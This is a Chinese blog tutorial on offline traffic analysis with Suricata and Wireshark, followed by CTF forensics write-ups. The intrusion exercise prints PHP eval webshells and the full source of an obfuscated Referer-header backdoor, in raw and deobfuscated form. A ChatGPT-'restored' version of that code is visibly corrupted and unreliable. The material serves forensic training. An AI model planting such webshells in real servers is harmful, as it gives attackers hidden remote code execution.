Suricata + Wireshark离线流量日志分析

2023-10-29 08:21

本文主要是介绍Suricata + Wireshark离线流量日志分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

一、访问一个404网址,触发监控规则

1、使用python搭建一个虚拟访问网址

2、打开Wireshark,抓取流量监控

3、在Suricata分析数据包

流量分析经典题型

入门题型

题目:Cephalopod(图片提取)

进阶题型

题目:抓到一只苍蝇(数据包筛选,数据提取)

数据分析题

题目一:(1.pcap)

答案:

题目二(2.pcap)

答案

未完待续……


Suricata 环境搭建:基于Ubuntu坏境下的Suricata坏境搭建_奈何@_@的博客-CSDN博客

suricata:监控日志

wireshark:监控流量

同时使用需要降噪,因为规则有许多重叠

题目及要求我打包上传了,有需要的同学自取

一、访问一个404网址,触发监控规则

1、使用python搭建一个虚拟访问网址

python3 -m http.server 9999

c0239021205547588adfb3c08700db47.png

b9aea8e977634bc799e21410c4686454.png

可见此时日志已经生成(看日志生成时间) 

d6a338b0133f440895766f50055ae125.png

5928eabbfde3452ab485d8b277953772.png

2、打开Wireshark,抓取流量监控

5fee65d725664f8bb5ef062cfb31eed0.png

抓取成功!!

3、在Suricata分析数据包

将数据包保存后上传在Suricata分析该数据包

0a311e83194242549d2728422fcabcce.png

suricata -c /etc/suricata/suricata.yaml -r ./404.pcapng -l /tmp/ 

bc505cab7309428b940f980b6513addc.png

此时数据到处在tmp目录下

ace0dea0edd64ee787687baea54be41c.png

9e8fd6df8ed64eaca853019cc305fb67.png

流量分析经典题型

CTF题型主要分为流量包修复、数据提取、WEB流量包分析、USB流量包分析、无线密码破解和工控流量包分析等等。

入门题型

题目:Cephalopod(图片提取)

  • 题目来源:XCTF 3rd-HITB CTF-2017
  • 考点:图片提取
  • 题目信息:(Cephalopod.pcapng)

24d8b60306d64487b90c72aff4170db5.png

数据包打开,分组字节流查询flag,发现出现了flag.png的字样,但是并没有这个图片文件,往下翻,图片应该在长度较大的流中,追踪tcp流在tcp.stream eq 2处找到图片文件,保存为原始数据

ace00d23134d48768293e5d71c608f21.png

51de57fdfc344589b4941acbf2d2fb1f.png

8fcd422aef7d47c1b6ff962c472ae88b.png

删除PNG 89前面多余部分,保存为1.png

96575aa71d504c4191f9fee867553e4f.png

3353ccf13baf43d8b8e44dc3a562f73f.png

得到flag

341af94291264f2bb776bdfd6a526871.png

进阶题型

进阶题型

题目:抓到一只苍蝇(数据包筛选,数据提取)

  • 题目来源:bugku
  • 考点:数据包筛选,数据提取
  • 题目信息:(misc_fly.pcapng)

8a986c906d81417fbb35777562942555.png

首先打开数据包,题目提示了抓到一只苍蝇,试一试搜索苍蝇

ff6fd26123a848dea6f9d9394917316f.png

将163 ,289 ,431 577 729保存

1c1ed04e74b643dc94368b94241e8a7b.png

将这五个包合在一起

使用liunx环境下的bb命令:

# dd if=1 bs=1 skip=364 of=1.1

# dd if=2 bs=1 skip=364 of=2.2

# dd if=3 bs=1 skip=364 of=3.3

# dd if=4 bs=1 skip=364 of=4.4

# dd if=5 bs=1 skip=364 of=5.5

4e41411de6704e199d41014195243aa2.png

如果发现没有dd 命令,下载即可

# apt install dd

添加后生成如下文件:生成新的数据块

47a7b84acb2a4ee4bb2975bc9995dd9f.png

将生成新的数据块何在一起:

#  cat 1.1 2.2 3.3 4.4 5.5 > fly.rar

使用cat命令将其重镜像输出到fly.rar,这样就形成了.rar压缩包

8bc279160ae1416faba7be710c5e3a20.png

利用python搭建网站:

# python3 -m http.server 9999

161bcf3e2e0a4c448641ab90b3da4f1b.png

将.rar文件移动到创建的网页文件下:

# python3 -m http.server 9999

eb34f3d589644c98ae51c637f8c2c33c.png

在网页中下载即可

b4cb4a8fe16144b2841945b740ec09c7.png

解压时我们会发现提示需要输入密码

352d43f603a94f8ab067a8af94ba4c97.png

使用010-editor打开

如果在十六进制中发现74 84 字段——只要不是80 ,那都是伪加密

3fc08dbdddc3432da936b0aa89186d4e.png

解决方法:将84还原成80

16ee0625edef4e5e9927e6b2f6b58bc5.png

解压成功:

710118eafcd543e3b849c0f63c05c0de.png

打开后发现是一堆乱码:

fec45502d65348ea8878a65f6f10976d.png

将文件后缀名更改成.exe,之后再打开你会发现一件神奇的东西

fly.exe

现在知道文件名为什么叫flags了吧?

这是为什么呢?我们来查看该文件的真实面貌

将其上传至linux中:

aed71e9b32ee4a9399311ed6dcb715d2.png

使用binwalk工具分离文件内的小文件

# binwalk flag.exe

可以看见该文件下包含着许多图片:

cd7dc53495cf4b3aa47d2f0386077167.png

如果没有安装binwalk工具,使用apt安装即可

# apt install binwalk

使用foremost提取该文件

# foremost flag.exe

5ad547262eb649a08d77b3508193c7d7.png

如果没有安装foremost工具,使用apt安装即可

# apt install foremost

acce0de73da04ed49b9d818777d5067a.png

提取的文件输出在output中

745055df8faa488c8846d7f06c655827.png

ff8a3ab74f9545fb81b9465a48cdf7c6.png

一共输出四个文件,我们以次查看:

# cat audit.txt

该文件提取出的是图片

55b2bec31c804d748d207ab98057a3e4.png

27e2131eb0f34aafa1177e7c1fcbee69.png

555660c37a634c4da1c7b628eec6d0e8.png

在windows环境下下载查看该文件

a82f4cef8c434b459f47acb94a65fd05.png

在png最后一个图片是一个二维码,手机扫码就会出现一个代码段:

a15d6489b9c84d06a922411518f4b3b2.png

37e3c846c7f945029f4fa2c08a303c62.png

数据分析题

题目一:(1.pcap)

题目来源:2018信息安全铁人三项数据赛

题目要求: 1.黑客攻击的第一个受害主机的网卡IP地址 192.168.1.8 nat 202.1.1.1:8000 扫描器:awvs 工具:sqlmap 2.黑客对URL的哪一个参数实施了SQL注入 list 3.第一个受害主机网站数据库的表前缀(加上下划线例如abc) ajtuc 4.第一个受害主机网站数据库的名字

打开流量包,流量包有点大,打开比较慢,这里我们先过滤为HTTP协议可以看到202.1.1.2192.168.1.8进行了疯狂的爆破

192.168.1.8

2b59ad90cfc94c22b9c482690bdee919.png

select

ajtuc_

joomla

不难看出,黑客利用的SqlMap在对目标站点进行不断的SQL试探注入 因此受害主机的网卡IP地址为192.168.1.8 而注入的参数也可以清晰的看见,为list[select]

d43052a7e8934b1ea5cae4a35f3ce67c.png

追踪http流,根据回显内容,目标站点数据库抛出的错误,可以清晰的看见

f2752e4d995a4723a4c1dfa6e40b7894.png

不难确定,目标站点的数据库表名前缀为ajtuc_ 接着为了确定受害主机网站数据库的名字,再进行了一次过滤

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

此时挑选最后一次注入的payload进行url解码

ac0fdea647da475f81250acf2e11b9e0.png

可以清楚的看到

FROM joomla.ajtuc_users

因此数据库名为joomla

答案:

  1. 黑客攻击的第一个受害主机的网卡IP地址 
    192.168.1.8

  2. 黑客对URL的哪一个参数实施了SQL注入
    list[select]

  3. 第一个受害主机网站数据库的表前缀(加上下划线例如abc_)
    ajtuc_

  4. 第一个受害主机网站数据库的名字
    joomla

    <?php eval($_POST['123']); ?>
    zzz=eval(base64_decode('')) ls -al

题目二(2.pcap)

题目来源:2018信息安全铁人三项数据赛

题目要求:

  1. 黑客第一次获得的php木马的密码是什么
  2. 黑客第二次上传php木马是什么时间
  3. 第二次上传的木马通过HTTP协议中的哪个头传递数据

根据题目一已确定目标ip,所以依旧使用以下过滤简化操作

<?php eval($_POST['zzz']); ?>

2018-02-7 17:20:44.248365

http_referer

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

可以看到一个奇怪文件kkkaaa.php,跟进POST数据查看

c2aab54cd43b4717a09dd8a27e9b28d5.png

不难发现,是中国菜刀的流量,木马密码为zzz 接着确定黑客第二次上传php木马的时间 我进行了过滤,猜想黑客应该是根据第一个木马来上传的第二个木马

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http.request.method==POST

此时一条数据格外引人注目

c21250c2fe024bd8a705bcfa6828587f.png

我们对其16进制进行分析

e96b0b8d52524103a1533c7924654524.png

将保存的值放入HXD中得到源码

370bc0ae28c340348146520f89cf644a.png

将文件保存为php,但是代码经过混淆过的,在代码末尾加上下面两句代码

也可以使用以下工具进行直接转码:

24d67ca3b24a478fa602202fac76dfbc.png

<?php
$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';
$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>';
$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';
$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';
$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';
$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';
$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';
$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';
$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');
$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';
$g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';
$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';
$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';
$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';
$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N=$j('',$x);$N();
?>

由于代码被打乱混淆,因此我们没办法直接分析该代码的具体功能

可以使用ChatGpt将代码还原

<?php
$p = 'lower";$i = $m[1][0] . $m[1][1];$h = substr($s(md5($i.$kh), 0, 3));$f = $sll($s(md5';
$d = 'q = array_values($q);preg_match_all("/(\\w)\\w+\\((;q=0.([\\d]))?,?/",';
$W = '),$ss($s[$i],$o=ob_get_contents();ob_end_clean();$d = base';
$e = '_LANGUAGE"];if($rr && $ra){$u=parse_url($rr);parse_str($u["query"],$q);$';
$E = '64_encode(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}';
$t = '($i.$kf),0,3));$p]="";for($z=1;$z<count($m[1]);$z++)$p].=$q[$m[2][$z]];i>';
$M = '$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$s="substr";$sl="strto';
$P = 'f(strpos($p],$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$>';
$j = str_replace('fr','','create_funcion');
$k = ';}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];';
$g = '"";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};';
$R = '$k="cb42";$kf="e130";function x($t,$k){$c=strlen($k);$l=strlen($t);$o=';
$Q = 's[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzunco';
$v = 'mpress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),';
$x = str_replace('>','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N = $j('',$x);$N();
?>

189fe9cae50f43de910160bdf9575a69.png

1141aff63f284b5088fd9d0f8386a412.png

var_dump($j);
var_dump($x);

运行php进行解混淆,发现这就是木马

cf98f81cc344461ba201c5cef3181dbe.png

由此可确定这个引人注目的包上传了第二个木马 因此上传时间为:17:20:44.248365 美化后

$kh = "cb42";
$kf = "e130";
function x($t, $k)
{$c = strlen($k);$l = strlen($t);$o = "";for ($i = 0; $i < $l;) {for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {$o .= $t{$i} ^ $k{$j};}}return $o;
}$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {$u = parse_url($rr);parse_str($u["query"], $q);$q = array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);if ($q && $m) {@session_start();$s =& $_SESSION;$ss = "substr";$sl = "strtolower";$i = $m[1][0] . $m[1][4];$h = $sl($ss(md5($i . $kh), 0, 3));$f = $sl($ss(md5($i . $kf), 0, 3));$p = "";for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];if (strpos($p, $h) === 0) {$s[$i] = "";$p = $ss($p, 3);}if (array_key_exists($i, $s)) {$s[$i] .= $p;$e = strpos($s[$i], $f);if ($e) {$k = $kh . $kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));$o = ob_get_contents();ob_end_clean();$d = base64_encode(x(gzcompress($o), $k));print("<$k>$d</$k>");@session_destroy();}}}
}

容易看到此时有两个与HTTP头有关的参数

$rr = @$_SERVER["HTTP_REFERER"];
$ra = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];

还是使用过滤

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http

然后可以看到许多请求footer.php的页面,点开一个查看详情

bed71968fbcf4c6990c8c3468d1de80d.png

容易发现referer数据十分可疑,而ACCEPT_LANGUAGE较为正常 所以可以基本确定,木马通过HTTP协议中的Referer头传递数据

答案

  1. 黑客第一次获得的php木马的密码是什么
    zzz
  2. 黑客第二次上传php木马是什么时间
    17:20:44.248365
  3. 第二次上传的木马通过HTTP协议中的哪个头传递数据
    Referer

未完待续……

这篇关于Suricata + Wireshark离线流量日志分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/299437

相关文章

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

poj 2135 有流量限制的最小费用最大流

题意: 农场里有n块地,其中约翰的家在1号地,二n号地有个很大的仓库。 农场有M条道路(双向),道路i连接着ai号地和bi号地,长度为ci。 约翰希望按照从家里出发,经过若干块地后到达仓库,然后再返回家中的顺序带朋友参观。 如果要求往返不能经过同一条路两次,求参观路线总长度的最小值。 解析: 如果只考虑去或者回的情况,问题只不过是无向图中两点之间的最短路问题。 但是现在要去要回

SWAP作物生长模型安装教程、数据制备、敏感性分析、气候变化影响、R模型敏感性分析与贝叶斯优化、Fortran源代码分析、气候数据降尺度与变化影响分析

查看原文>>>全流程SWAP农业模型数据制备、敏感性分析及气候变化影响实践技术应用 SWAP模型是由荷兰瓦赫宁根大学开发的先进农作物模型,它综合考虑了土壤-水分-大气以及植被间的相互作用;是一种描述作物生长过程的一种机理性作物生长模型。它不但运用Richard方程,使其能够精确的模拟土壤中水分的运动,而且耦合了WOFOST作物模型使作物的生长描述更为科学。 本文让更多的科研人员和农业工作者

MOLE 2.5 分析分子通道和孔隙

软件介绍 生物大分子通道和孔隙在生物学中发挥着重要作用,例如在分子识别和酶底物特异性方面。 我们介绍了一种名为 MOLE 2.5 的高级软件工具,该工具旨在分析分子通道和孔隙。 与其他可用软件工具的基准测试表明,MOLE 2.5 相比更快、更强大、功能更丰富。作为一项新功能,MOLE 2.5 可以估算已识别通道的物理化学性质。 软件下载 https://pan.quark.cn/s/57

poj 3422 有流量限制的最小费用流 反用求最大 + 拆点

题意: 给一个n*n(50 * 50) 的数字迷宫,从左上点开始走,走到右下点。 每次只能往右移一格,或者往下移一格。 每个格子,第一次到达时可以获得格子对应的数字作为奖励,再次到达则没有奖励。 问走k次这个迷宫,最大能获得多少奖励。 解析: 拆点,拿样例来说明: 3 2 1 2 3 0 2 1 1 4 2 3*3的数字迷宫,走两次最大能获得多少奖励。 将每个点拆成两个

poj 2195 bfs+有流量限制的最小费用流

题意: 给一张n * m(100 * 100)的图,图中” . " 代表空地, “ M ” 代表人, “ H ” 代表家。 现在,要你安排每个人从他所在的地方移动到家里,每移动一格的消耗是1,求最小的消耗。 人可以移动到家的那一格但是不进去。 解析: 先用bfs搞出每个M与每个H的距离。 然后就是网络流的建图过程了,先抽象出源点s和汇点t。 令源点与每个人相连,容量为1,费用为

poj 3068 有流量限制的最小费用网络流

题意: m条有向边连接了n个仓库,每条边都有一定费用。 将两种危险品从0运到n-1,除了起点和终点外,危险品不能放在一起,也不能走相同的路径。 求最小的费用是多少。 解析: 抽象出一个源点s一个汇点t,源点与0相连,费用为0,容量为2。 汇点与n - 1相连,费用为0,容量为2。 每条边之间也相连,费用为每条边的费用,容量为1。 建图完毕之后,求一条流量为2的最小费用流就行了

衡石分析平台使用手册-单机安装及启动

单机安装及启动​ 本文讲述如何在单机环境下进行 HENGSHI SENSE 安装的操作过程。 在安装前请确认网络环境,如果是隔离环境,无法连接互联网时,请先按照 离线环境安装依赖的指导进行依赖包的安装,然后按照本文的指导继续操作。如果网络环境可以连接互联网,请直接按照本文的指导进行安装。 准备工作​ 请参考安装环境文档准备安装环境。 配置用户与安装目录。 在操作前请检查您是否有 sud

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

我在移动打工的日志

客户:给我搞一下录音 我:不会。不在服务范围。 客户:是不想吧 我:笑嘻嘻(气笑) 客户:小姑娘明明会,却欺负老人 我:笑嘻嘻 客户:那我交话费 我:手机号 客户:给我搞录音 我:不会。不懂。没搞过。 客户:那我交话费 我:手机号。这是电信的啊!!我这是中国移动!! 客户:我不管,我要充话费,充话费是你们的 我:可是这是移动!!中国移动!! 客户:我这是手机号 我:那又如何,这是移动!你是电信!!